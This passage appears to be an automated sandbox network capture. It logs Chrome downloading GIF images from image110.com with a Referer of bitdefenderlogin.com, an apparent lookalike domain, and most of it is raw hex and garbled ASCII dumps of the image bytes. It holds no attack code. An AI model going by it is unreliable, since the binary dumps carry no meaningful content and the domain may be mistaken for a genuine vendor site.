                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:33 UTC348INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:32 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 342855
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:23:36 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bf38-53b47"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:32 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:33 UTC16036INData Raw: 47 49 46 38 39 61 e8 03 64 00 f7 ff 00 4e 4e 4b a7 25 ae c7 55 00 e8 b6 91 f1 97 2e fd d2 4e 6a 4f 31 db db db b8 49 02 cd 91 6f 71 6f 6f f7 86 00 58 30 20 30 80 7b f5 db c8 fa ed e6 d9 8c 34 ce 71 2d ec eb ea 36 5a 5a ed d9 c9 d8 8b 4f f6 c5 90 e7 cb b5 d6 ba a9 e9 a9 3a ff d5 00 54 3a 5c f6 d7 b9 fc f5 ec b0 6e 4f b6 8b 6e fb f6 01 92 6e 4e e7 98 4a e8 c5 a9 c7 79 51 2f 18 10 ff 2d 00 f5 e4 d5 db c4 b2 7d 82 82 dd 6b 00 f8 ba 44 ab 8d 51 d5 64 00 9a 9a 97 a9 3a 04 c8 c7 c5 d3 b1 4c 8c 89 86 db a3 3a f0 d1 6c ff e5 54 ed 7c 00 a9 a7 a5 e4 73 00 af 51 28 dd b5 9b dc a3 78 10 da ce fb e3 cb f3 df d2 86 71 33 d9 a6 88 91 90 27 fb d7 aa d2 14 da e6 bc a5 e5 de da ff fd fb f6 ba 79 ff b9 00 f8 b4 65 b1 73 28 b1 b3 1b a6 99 92 b7 89 2e eb d2 bd fd ed dd f4 03
                                                                                                                                                          Data Ascii: GIF89adNNK%U.NjO1IoqooX0 0{4q-6ZZO:T:\nOnnNJyQ/-}kDQd:L:lT|sQ(xq3'yes(.
                                                                                                                                                          2024-06-09 22:40:33 UTC16384INData Raw: 95 5e 29 96 66 e9 86 22 60 8a a6 66 03 6a 29 98 86 a9 98 8e 29 f4 74 69 8a 7e 29 41 06 45 0f cc 20 9b b6 29 9b 42 c2 27 ca 02 31 cc 69 73 ba a9 9d ce e0 09 34 04 8d da 28 31 9c 03 04 9c 03 a0 06 aa a0 0e 2a a0 fe a9 17 c8 82 92 fa 68 3f b4 02 90 72 c0 90 da a8 b7 38 6a 92 4e ea 92 7e 06 99 5e 2a a6 66 aa a6 6e 2a a7 76 ea c8 c8 41 ad 99 29 61 ba 9d a7 96 aa a9 9e 2a 57 80 aa a8 8e 2a e5 f5 62 88 b4 42 0b c4 aa ac ce 2a ad b6 c0 33 d8 2a ae d6 6a ad e2 e4 21 e0 ea 33 10 83 03 ec 8b 11 70 01 04 f8 ea 39 28 aa 08 e0 ea 39 38 80 17 dc ea 33 68 83 f0 9d 83 af e6 aa ae 3a 2b ae 7a 81 76 a2 aa b6 6e 2b b7 76 ab b7 66 2a 03 e0 d8 aa 06 a2 22 40 db b7 9e 2b ba 5e 69 b8 8e ab 38 96 ab 7b 86 48 17 e8 aa bc ce 2b bd 32 ff 22 41 c4 ab ac 9e 42 3f 8c 00 6c 56 40 bf fe
                                                                                                                                                          Data Ascii: ^)f"`fj))ti~)AE )B'1is4(1*h?r8jN~^*fn*vA)a*W*bB*3*j!3p9(983h:+zvn+vf*"@+^i8{H+2"AB?lV@
                                                                                                                                                          2024-06-09 22:40:33 UTC16384INData Raw: e4 5a ae e6 9a 8a a1 08 7a 64 10 73 c8 6a 99 2e 11 7a a3 c7 91 86 e7 8a 09 67 10 6e 80 9a 0b 81 37 05 11 a8 3b 41 02 8d ba 9a af 80 05 11 b0 9a 6e 70 01 39 d1 59 ff f0 85 da b3 89 9a ca 2b 2d 0a 11 9f 5a a9 a2 0a 51 a4 ca 31 4b c5 4b d9 87 10 3d 5a 77 e7 66 43 11 f3 aa 43 15 8e 10 25 ab 95 48 ab 47 5a 10 e6 c0 67 e1 79 81 6d f9 ab 58 0a 7a ed 19 ae f8 e6 a7 5d 61 a7 46 ff 11 8f 03 77 a5 05 e8 10 4a 63 aa 0c 13 a6 b5 ea 70 64 77 ad 0c c1 67 dc 5a 2a 11 29 10 6e fa a6 a0 67 1c c4 aa 6f ed c9 a7 50 db 15 52 0a 7a f2 c6 ac 7f 6a 10 fe 8a 00 08 c1 b5 06 81 00 02 00 b6 62 db 13 15 10 b6 66 2b b6 66 4b 04 23 e0 06 44 f0 0f 63 8b 13 36 b4 39 ef 97 41 36 95 08 83 39 10 b4 09 76 87 f9 32 ce 97 a4 c2 39 aa 10 3b 89 3e 5b a6 06 61 43 4b e5 54 1e 1b b4 fd 40 9c 8b 83
                                                                                                                                                          Data Ascii: Zzdsj.zgn7;Anp9Y+-ZQ1KK=ZwfCC%HGZgymXz]aFwJcpdwgZ*)ngoPRzjbf+fK#Dc69A69v29;>[aCKT@
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: 60 f4 0b 13 08 0c 07 82 aa f8 5b 8d 54 40 8c 21 22 1b fd 00 81 dc 03 39 38 fa 98 af f4 0e c7 d0 02 f5 c2 12 f7 c8 c1 98 2c a4 21 c9 9a 51 5b cd 1e a9 be 1e 69 99 9e 94 88 92 ca c9 05 59 0a 8f 3c 4c 4a 99 3d c5 2c 08 b7 12 a5 c7 74 ad a1 34 1d ff aa eb 8b 05 b0 cc 70 4c 98 cd 54 92 7e f8 87 7e 58 4e 89 70 ce 88 68 4e 88 80 4e e6 ec 07 23 a8 47 e5 b2 9a 58 49 45 13 1a cb 02 a3 17 1e c1 2a ee dc c1 91 01 bf f0 60 4b 8b 90 26 da 34 48 99 34 09 19 9a 4b 82 aa cb bf 84 8a c8 61 89 45 99 89 75 63 93 59 b9 b2 62 73 c2 ec 4b 35 7d e1 91 a4 50 a4 9c f0 06 d3 bc 88 25 68 b3 c8 43 4a a9 cb a3 81 e0 46 85 08 4e 3d 91 50 83 78 1e fd 58 82 59 ab 95 8f 09 8b 59 74 89 1f 89 c1 33 3b d0 69 f1 4b b0 22 cf 83 a3 44 89 40 93 7a e2 17 a4 20 d0 92 c0 8e 28 9c 88 04 a5 0b 07 15
                                                                                                                                                          Data Ascii: `[T@!"98,!Q[iY<LJ=,t4pLT~~XNphNN#GXIE*`K&4H4KaEucYbsK5}P%hCJFN=PxXYYt3;iK"D@z (
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: 15 7d 7d 44 07 1e 30 d7 0e 3c c1 02 60 90 b1 40 5a f0 0f 52 73 e4 19 02 41 f5 40 2a c0 81 2e 0c c4 0b b2 10 88 a8 81 12 64 06 12 35 76 62 ac 75 e8 ca ec 42 8b 45 84 9d 10 ce 58 37 99 2a 91 2a 2b f9 ca 3a 44 e3 a0 3d db e5 ff 8e 4d b6 d8 02 e5 44 ca 40 a9 b0 90 e1 20 91 ae 0b 08 90 30 8a 7d 78 fb db e0 de 87 09 52 81 84 d8 68 60 01 26 08 b7 ba 47 d1 88 37 97 06 04 a1 d8 1c c6 12 c6 67 e3 d5 56 ca a0 a5 99 06 2d 96 61 41 b2 34 21 d4 e6 c7 b5 33 92 ed c3 5c bb db ea 06 b7 09 1a 51 6e d3 9c 3b dd 09 ff f6 28 90 e0 ee d9 c4 fb 21 b2 a8 80 05 5a e1 80 47 f8 a0 07 6b 70 40 07 3a e0 03 11 00 53 16 aa ff fe 89 08 4e 70 88 58 7b e1 c7 c4 38 c7 29 9e e1 ea 9f e8 da d7 b7 36 f6 40 29 77 ad 5d 6f f8 93 bf 56 a7 42 a0 3c b1 6d 18 fd e8 48 ff 64 db 92 7e f4 85 e8 7c cb
                                                                                                                                                          Data Ascii: }}D0<`@ZRsA@*.d5vbuBEX7**+:D=MD@ 0}xRh`&G7gV-aA4!3\Qn;(!ZGkp@:SNpX{8)6@)w]oVB<mHd~|
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: c7 ba 89 11 74 7e 53 a5 2b 75 23 39 31 68 34 60 65 ab 91 21 81 96 1e 12 f1 39 71 f2 c4 49 07 5a d9 c8 ee 69 c0 86 e4 eb 72 b7 3a 22 f4 7a 94 15 70 a6 93 7f 03 7d ea fe 96 48 90 98 46 46 1d ef ec 08 2d 1e ea 4c ae e0 d5 04 78 bd a8 5d e8 82 d3 6d d1 22 21 43 fb c4 2b fd 09 cc 86 18 cb a4 0a 49 e8 b0 72 69 a4 5a 39 c7 ff 97 1e 69 ec 01 95 9a 99 99 d6 b5 2f 1f d9 29 f6 70 0a 51 7e 84 12 b4 a1 d4 22 47 b9 52 ca be 08 b6 a8 ab 45 55 c8 8e 08 d0 59 c9 cf 8d 0f c1 15 06 6f a1 0e 93 48 40 41 53 05 49 65 3f 81 92 ac 12 eb a3 24 99 99 57 bd 09 56 43 d5 76 24 84 14 60 af 7a d8 8f 83 12 b0 67 53 65 ab fd 06 92 3c a9 dc 72 32 3d a1 03 43 3f 22 87 bb 4e 94 2b e3 13 6f 5e cb db d7 b7 fc f5 a7 6b 93 43 ea be f4 ca ca ba c0 5f ab 84 a7 3a 69 86 52 b7 36 55 b6 13 f1 d8 40
                                                                                                                                                          Data Ascii: t~S+u#91h4`e!9qIZir:"zp}HFF-Lx]m"!C+IriZ9i/)pQ~"GREUYoH@ASIe?$WVCv$`zgSe<r2=C?"N+o^kC_:iR6U@
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: fc 42 ff 09 25 41 df 80 04 16 38 db 7a f8 25 f8 95 31 fb 19 e8 20 48 08 2a 28 e1 3e 0c 72 b4 80 28 e4 89 92 d0 85 1c 62 78 c7 40 e3 3d 28 e2 88 24 d2 45 cb 7d 13 be 47 4b 89 2c 5e 74 62 8a 13 c2 c7 91 28 7c 1c b1 a1 86 08 89 12 86 8d 2d f6 e8 e3 8f 22 6d 07 23 8c d6 01 69 e4 41 42 0e 39 61 91 1a 59 60 c1 2e 04 e0 18 a5 0d 3d 44 29 8a 0d 06 5d 49 c0 25 aa 1c e9 e5 97 60 22 b4 c1 1c 4a 96 39 c7 06 61 fa 38 66 99 4a 9e 89 11 26 57 1e d1 03 96 3d 58 20 10 27 ff 60 f9 cf 25 04 d9 e0 67 9a 80 06 0a a4 1c 28 b2 a9 20 14 af 09 fa 20 a1 86 2a 89 28 46 9d d8 10 06 28 7e ee d8 c7 3f 04 e4 f9 8f 05 1f 3e 91 e7 9f e7 1d d0 cf a8 a4 f6 73 c0 45 b7 b8 90 c2 45 0a 4c e1 ea ab ae 2a ff 80 de 2d b0 29 70 c0 ad b8 1e e0 02 41 b6 e6 7a ab ac 7a d1 ba 90 39 c8 ec 7a d0 14 c2
                                                                                                                                                          Data Ascii: B%A8z%1 H*(>r(bx@=($E}GK,^tb(|-"m#iAB9aY`.=D)]I%`"J9a8fJ&W=X '`%g( *(F(~?>sEEL*-)pAzz9z
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: 8e 41 8b ea 89 87 89 88 71 f4 08 f1 b7 12 e1 0e ff 60 09 55 81 00 6e fb 11 29 63 5f cb 9d 95 fc 7d 3f 8b bb f7 c0 02 ce 38 4f d9 69 3c b8 6e 8c e1 46 e9 65 34 c3 4c 9f 13 c7 f3 f6 87 7d 9e 7f e0 1e e8 1f 2e dd e6 16 d1 b2 4b f6 e2 27 89 a3 20 e9 95 c1 db 37 e4 64 34 ee ec fc 3e b1 c8 b8 e7 9c ee 4f 5a 2f f0 6a 8e da 05 31 dd d4 0d f6 75 3a 16 8b 3e a0 e2 ad 86 8e d8 0d 73 c8 f9 09 e1 e5 9a 81 00 09 a0 fb 3c 21 e3 cd 08 c6 59 41 f2 3b 9d e9 33 af 8f d5 5e e7 12 ce 46 ce 07 bc 8e 4c f3 8e 6f f3 e1 2e e8 5e ad 10 64 67 19 3d 0f a0 6d 5d 80 99 ff 7f 1a ea ee a4 73 78 18 63 20 8c a1 fe d8 2f 9a e1 ad ea 5e dc 8e fe d5 74 fa b6 96 fa 2c 75 fd 41 ee f0 8d 80 ea 41 6b e8 8e d7 0d 9a cf 0f d6 0d 10 fb 04 0e 24 58 90 a0 89 7f fc 14 2e 64 c8 70 cc 3f 88 11 25 46 7c
                                                                                                                                                          Data Ascii: Aq`Un)c_}?8Oi<nFe4L}.K' 7d4>OZ/j1u:>s<!YA;3^FLo.^dg=m]sxc /^t,uAAk$X.dp?%F|
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: 64 08 c8 02 94 ca 80 01 90 07 09 1b 23 48 b1 00 27 48 65 50 98 04 50 00 9b 35 a0 00 2b 60 85 10 50 83 11 40 85 77 88 85 77 28 86 62 c0 eb 77 e8 05 22 68 87 a9 d0 81 c2 de 01 39 72 3f c2 41 66 3a 42 66 06 38 39 c7 6e 03 18 d0 5f 6c 14 39 42 a0 00 50 e8 81 5d c8 85 ff d4 cc 39 19 48 1c 76 b0 06 6b a8 06 5c 68 00 19 58 87 28 fb 04 26 10 08 ca b1 60 05 f8 84 3d d0 85 09 d0 05 40 40 54 40 9c ed 36 ab 6d 64 ba 1f 87 a0 97 97 ee 2b 53 92 0c e1 d6 8c 1b 18 6e e2 5e 8f f5 ac 0c b7 6d e9 4f a8 6f c3 f0 6f e7 26 0e 25 66 08 e5 e8 e1 81 58 80 ea 96 e3 eb 46 17 24 be 9e 6e e0 69 17 d4 00 12 f1 19 09 ff 26 49 07 8d 0e 54 8c 14 98 f5 74 74 db 0f 7e 6f fd 7e 96 81 50 80 29 a0 03 80 de e2 95 66 e9 2c 2b 63 98 46 e3 b9 fb 3c 4e 67 62 23 71 e3 7f 20 83 d4 2d 08 f1 e4 33 ec
                                                                                                                                                          Data Ascii: d#H'HePP5+`P@ww(bw"h9r?Af:Bf89n_l9BP]9Hvk\hX(&`=@@T@6md+Sn^mOoo&%fXF$ni&ITtt~o~P)f,+cF<Ngb#q -3
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: 00 05 30 03 52 12 56 de 61 21 c9 23 10 16 e4 01 a8 b1 46 6a 80 8f 7c e6 0e 66 f0 01 a8 71 1a 17 34 02 ab 00 0b 72 23 98 86 86 28 9e 00 99 19 66 10 bb c1 3c d5 b3 0e 12 20 01 95 37 59 2e b7 51 6d aa 6a ce b6 7b 26 65 a3 68 9a a6 06 01 84 38 7a a6 63 0a 52 1f 76 74 07 11 51 b9 08 11 0a 72 23 20 b0 00 82 2a a8 26 80 04 00 02 02 dd b0 af 4d da 08 ff a1 af 4c ba 00 75 52 0e 5f 9a ae 2c 49 a6 29 f9 0f 9a b9 6a 1f f9 0f ee 0a a6 9f 35 83 45 26 10 34 0a 6a 74 3a 10 f7 8a a5 01 2b b0 82 da 0d 51 1a 1d 64 40 a5 22 bb 0f ff 50 b0 03 4b 24 0a db 10 10 a0 9e ad b0 8c 3d 70 08 44 ff 60 01 4e 60 01 03 d0 01 86 70 0e 11 70 8d a7 a0 0d 36 21 06 e7 e0 00 03 a0 0d da 00 01 b2 70 0a 15 e0 05 a7 b0 7e 2b c1 a2 0b 11 49 4d 00 67 31 a0 09 66 25 12 65 60 a0 b8 7a ab b7 8a ab 60
                                                                                                                                                          Data Ascii: 0RVa!#Fj|fq4r#(f< 7Y.Qmj{&eh8zcRvtQr# *&MLuR_,I)j5E&4jt:+Qd@"PK$=pD`N`pp6!p~+IMg1f%e`z`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          17192.168.2.549733103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:33 UTC384OUTGET /uploads/0c3fb40c0b1b142849b7f16af333a5f2.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:33 UTC348INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:33 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 335177
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:23:34 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bf36-51d49"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:33 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:33 UTC16036INData Raw: 47 49 46 38 39 61 e8 03 64 00 f7 ff 00 23 16 08 00 93 bd ff ff 01 19 a5 cf 9d 01 00 94 88 4a 8d 6e 0b ff fa cc 6c 51 0a d8 94 0b cc b3 53 f7 d5 29 cd bb 65 45 31 16 b5 8f 0d f8 ec a8 d7 d5 d5 ef 00 ff fd fc f7 88 71 30 ff fe d9 cf ad 2a a7 96 4f 91 8e 8d ab ac aa e5 b3 2c d4 a8 11 f9 ed 86 8a 79 44 ff fb 95 f2 cf 0f ed de 75 17 10 06 ff ff a9 69 55 2b 74 68 33 e7 cc 68 ff 68 68 62 cd ee ba af 68 e5 0d 0b b2 92 2c ff ff eb 41 39 37 ef ce 88 6e 6d 6c eb b8 44 0c 5f 67 32 2e 2b b6 a6 55 d4 95 37 42 b5 d8 ff ff 14 f8 ec 9a 57 44 05 76 6b 49 ff ff 26 ff d6 d5 10 08 00 ff ff 77 d4 c9 8f dc c6 64 08 08 00 e9 d6 6a ff ff 56 ed d8 95 93 84 2e ff ff 35 f7 5a 21 ff ff 46 58 46 23 f5 46 05 72 00 00 50 4e 49 ed eb 85 15 6e 8d ff 99 99 7c 62 0a f7 9f ff ff ee 75 8b 86
                                                                                                                                                          Data Ascii: GIF89ad#JnlQS)eE1q0*O,yDuiU+th3hhhbh,A97nmlD_g2.+U7BWDvkI&wdjV.5Z!FXF#FrPNIn|bu
                                                                                                                                                          2024-06-09 22:40:33 UTC16384INData Raw: 01 ba df 54 a6 df 47 6e e4 fc 41 e0 05 7a 69 4a 1e 65 81 80 e9 ff e5 1a 81 70 e9 81 18 64 3f 68 20 80 e4 64 80 08 64 3f 5c 40 b1 b5 24 01 ea e4 98 1a a5 81 5c 83 5a 24 e0 ff 1d e5 53 06 c8 b5 71 24 9a 4e 48 7f 18 64 7e 40 01 06 68 42 d7 3c 12 24 b5 5b 90 9a 25 89 04 0f 0b 5e d2 20 d4 43 9b 84 c2 04 e8 82 0f e8 02 c0 75 09 20 80 80 92 a8 d2 1a a4 a1 5c 86 c1 0f c0 80 0f 20 40 0a b0 16 02 18 41 03 c8 56 19 e8 82 31 25 49 05 6c 57 13 c0 81 05 60 d7 c6 31 42 21 4c 00 ca 65 66 5a fa 89 37 1d 0a a1 d0 22 d0 4d 80 77 25 ab 77 11 cf ba 58 00 b2 2e ab 05 44 6b 0c e8 e0 3d cd 53 50 cc a6 3e 31 5d 35 38 9d a9 90 c3 6e aa 83 41 58 40 35 80 02 07 58 1d 78 ee 4f 35 70 c4 70 86 eb 46 d0 c1 a2 70 84 40 e9 cf 84 9d 9d 41 94 ff 04 26 52 01 76 16 80 3a 6c 27 15 d4 d2 c9 81
                                                                                                                                                          Data Ascii: TGnAziJepd?h dd?\@$\Z$Sq$NHd~@hB<$[%^ Cu \ @AV1%IlW`1B!LefZ7"Mw%wX.Dk=SP>1]58nAX@5XxO5ppFp@A&Rv:l'
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: cd 5c cc cd c5 12 9a dc 94 23 de 8c 23 3a 02 ce 54 bd 2c 3f b0 a3 e2 24 ce 4a 50 ce 58 c5 46 f1 20 89 e6 b4 d5 ea 03 1b f5 5c a4 e1 99 b6 ea 0c 0e b3 b9 12 09 75 2f 48 ea c0 05 a1 d0 63 2b 41 96 5c 49 da 62 05 ec dc 0f f6 04 c8 6b 13 d1 fe 92 11 f3 98 56 6b db 9c 1f 99 c9 9a 5c c1 c3 69 b8 87 0c a6 e3 61 02 68 9a 48 03 ed 0f 72 c5 48 34 e1 b7 eb 9b 4e da 0a 9c 24 a1 c7 74 8c c9 f3 c8 d0 09 b9 9b f6 70 ad 0e 75 1d b1 c1 0f f4 4b 1c 8a 73 4f 75 d2 d6 0f e1 d6 58 f2 d6 cf 31 a4 17 55 d8 9d bc c1 19 7d bb 18 1a 04 06 a8 80 13 b0 80 2c e8 81 43 58 03 00 d2 00 57 f0 01 46 d0 82 ab 32 00 21 48 29 ac 93 a8 43 90 82 10 28 04 0e 90 80 bb d4 85 0b e0 05 12 c8 80 0c 08 83 05 c8 00 54 6c 3b a8 94 08 64 d1 05 4e 28 03 04 ff 48 4b 9e 8d 3a 74 89 3a 1b 10 81 b8 54 16 92
                                                                                                                                                          Data Ascii: \##:T,?$JPXF \u/Hc+A\IbkVk\iahHrH4N$tpuKsOuX1U},CXWF2!H)C(Tl;dN(HK:t:T
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: 9a a3 08 32 a0 e0 34 00 81 f0 a3 40 1a a4 73 39 9c 3f 01 9d d5 41 82 0f 0a 14 71 79 a0 06 9a a0 c0 09 a1 76 68 a1 8d b5 a0 5a 71 22 29 82 13 37 ea 16 2c 6a a2 33 6a 6e 49 79 6e 5b da 27 4f 11 a6 fe 91 49 61 9a a5 17 a8 a3 6a da 1b 3c ea 92 c1 e9 97 49 d1 a6 2a 89 a4 4f fa 13 73 c9 8d 8f 45 a4 c1 e9 92 4c 6a 6c 18 39 a7 6b 7a 1c c3 18 a8 84 1a 1b 08 3a 00 88 8a a8 7a 5a 07 2f ff 89 9c 41 11 0c 89 9a a8 6c 19 a9 92 4a 9c 94 3a 00 78 79 a9 7a 1a 92 97 2a a4 9e aa a9 85 da 1a ff 19 aa a4 7a 19 87 1a a9 9b fa 12 8c ea a8 3e f1 07 97 8a a9 33 f1 02 af 5a 97 cb 79 a9 99 4a a9 a9 5a 13 9d 7a 13 75 90 a8 05 5a aa ab 31 aa c0 3a ac 90 71 aa 95 9a 13 75 10 08 8a 8a 14 b2 7a a9 34 d1 ac 94 4a ab 76 69 ab 71 08 aa ad ea a7 05 ba 04 ac fa 12 90 0a a7 c4 7a 1a c2 fa ad
                                                                                                                                                          Data Ascii: 24@s9?AqyvhZq")7,j3jnIyn['OIaj<I*OsELjl9kz:zZ/AlJ:xyz*z>3ZyJZzuZ1:quz4Jviqz
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: 57 20 e1 a0 e2 b4 d6 92 9e 63 19 83 dd d0 f9 31 d8 5c c5 56 f6 bf a2 fd f6 28 95 5c 20 82 f1 45 ea 38 16 bf 52 84 ec 64 89 12 8c c7 76 b9 cb 3f f1 3d 63 91 0f 13 e5 83 13 ee 34 a9 6c 63 eb 40 fd 9e ac 8f f7 cd 6f ac f2 a1 c2 72 6d a9 a8 26 ef b1 70 ff 53 59 a5 32 01 1d 22 c6 9e d8 d7 d0 5d 3f f9 4b ff 67 76 49 3f 43 eb bd 4a c9 a2 4f fd 5d b0 73 57 fe 09 f6 78 4e 42 9d ab db 42 5d ba 45 30 36 26 57 5e 25 04 2e 66 69 e8 e2 5d 50 c5 48 23 06 37 b2 07 2f 13 e0 2e 16 a6 33 e6 85 7b 18 18 58 ce 07 5f 38 b1 81 d5 91 71 42 51 7c 8e 45 13 e0 44 0c ce e6 52 8e c5 7c 74 e4 58 d0 27 13 d2 d7 58 14 67 1d 93 83 13 31 58 1d 81 a0 38 cf 07 82 4e 61 4e da d2 2d ed 21 73 84 14 6f 32 e2 79 f6 d1 2e ec f7 79 b0 37 1f ed 42 2a 55 65 50 51 23 6b e9 26 79 4e e7 7f cf 25 1f 1e
                                                                                                                                                          Data Ascii: W c1\V(\ E8Rdv?=c4lc@orm&pSY2"]?KgvI?CJO]sWxNBB]E06&W^%.fi]PH#7/.3{X_8qBQ|EDR|tX'Xg1X8NaN-!so2y.y7B*UePQ#k&yN%
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: 3a d5 c9 23 51 f6 48 a2 12 f9 51 45 09 5c 60 c5 de 43 20 8f 79 82 84 f3 31 9a 27 3c 46 37 b6 e5 47 82 11 1c 17 a9 26 79 ff 3e 9c 58 6d 75 e7 6a 64 a3 78 d4 49 81 5e 32 6a 61 ab 20 bd 3c 71 29 83 09 21 53 9e 08 25 ba e4 c3 ca a9 bd 32 3b cf b8 81 02 66 69 cb 5a 16 80 03 37 20 a1 ec 1a f5 cb bf 11 f3 a4 28 7d 4a 3d 7c a6 cc a0 d4 d1 39 d4 04 ca 0b e0 b8 3f 9b ac 14 67 f6 f3 09 e8 1a 77 1d 67 16 e5 58 f7 5b 96 88 c8 a9 26 3f 26 70 3d af 5b 27 71 06 94 02 7d 0d 22 6b 57 e0 5d a3 2e 6a cf 3e 4d c0 6c 51 e3 27 51 e6 63 86 b2 8d cb 60 15 20 17 2b 29 65 4f 1b 15 f4 0a 00 2b 62 d2 f8 85 c3 2b a0 d2 95 9f 6a d4 aa 0e 96 ad da ad 12 93 16 cd 58 46 37 7a c9 92 6a 2f 98 29 0d ac 60 85 72 05 cc cd cf 28 ef 8b c9 ad c0 c9 d8 c6 3a f6 b1 8f fd d0 61 6d 52 87 6b 7e 91 7f
                                                                                                                                                          Data Ascii: :#QHQE\`C y1'<F7G&y>XmujdxI^2ja <q)!S%2;fiZ7 (}J=|9?gwgX[&?&p=['q}"kW].j>MlQ'Qc` +)eO+b+jXF7zj/)`r(:amRk~
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: 7e 66 b0 f3 e3 d5 b2 5b 3f 13 86 7b f7 3e af c8 97 0f 74 fe fc a9 f6 ef 4b d5 9f 5f 67 fe fe 54 ad 20 e0 80 e5 31 85 dc 72 08 26 a8 da 76 dc 75 57 cf 54 cb 34 e8 1c 31 55 31 28 a1 09 0f 2e 65 e1 73 de c5 74 a1 09 d9 51 f5 c8 88 54 94 58 62 3d 28 d6 b3 de 8a 2b c6 f4 de 8b 04 c6 b8 42 88 2f fd 67 e3 7f 32 dd b8 df 8d 3c d2 d8 a3 8e 30 fd 48 63 4d 42 da 24 64 8f 34 cd 27 a3 53 07 2a e8 e4 93 9f 35 d7 e0 0c d3 5d 98 47 55 1f 9a c0 4e 4d c4 4c 08 d4 0a 1f 96 37 c3 85 14 4e 95 c8 88 8f 98 48 45 8a 28 b2 c8 ce 04 ae b0 f7 92 7b 29 98 51 c8 08 30 c8 48 20 7d 35 5e 71 86 19 67 8c 70 24 9f f2 85 62 c6 a1 42 14 69 54 a1 02 34 5a c1 a0 ff 0c 8a 63 a4 f2 9d 31 81 7c 13 1c 6a c6 a5 43 e6 28 df a1 81 fa 09 68 a2 92 96 4a e9 20 a8 a6 fa 67 a3 42 e4 f9 22 7c 47 35 ff 09
                                                                                                                                                          Data Ascii: ~f[?{>tK_gT 1r&vuWT41U1(.estQTXb=(+B/g2<0HcMB$d4'S*5]GUNML7NHE({)Q0H }5^qgp$bBiT4Zc1|jC(hJ gB"|G5
